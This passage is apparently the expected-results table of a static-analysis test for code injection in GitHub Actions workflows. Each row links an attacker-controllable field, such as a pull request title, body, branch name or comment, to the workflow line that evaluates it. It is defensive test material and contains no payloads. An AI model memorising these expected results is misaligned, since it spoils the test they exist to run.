$@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | -| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | -| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | -| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | -| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | -| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | -| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | -| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | -| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | -| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | -| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | -| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | -| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | -| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | -| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | -| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | -| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | -| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | -| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | -| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | -| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | -| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | -| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | -| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | -| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | -| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | -| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | -| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | -| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | -| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | -| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | -| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | -| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | -| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | -| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | -| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | -| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | -| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | -| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | -| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | -| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:14:21:14:57 | 